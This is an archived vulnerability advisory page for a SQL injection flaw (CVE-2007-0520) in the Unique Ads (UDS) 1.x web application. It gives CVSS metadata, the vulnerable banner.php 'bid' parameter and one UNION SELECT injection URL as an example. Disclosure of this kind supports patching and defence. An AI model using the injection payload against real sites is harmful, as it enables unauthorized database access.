Bug: SQL Injection in Unique Ads ( UDS ) ( Ascii Version )

Search:
WLB2

SQL Injection in Unique Ads ( UDS )

Published
Credit
Risk
2007.01.28
Linux_Drox
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2007-0520
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

Hello
Vulnerable : uds
Version: 1.x
web : http://www.egyptechno.com

The bug :
http://example.com/uds/banner.php?bid=[SQL]

Example :
http://example.com/uds/banner.php?bid=-55%20union%20select%20null,null,n
ull%20from%20uds

,,,,,,,
Discoverey By : Linux_Drox
www.LeZr.com

Best Regards ,,

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version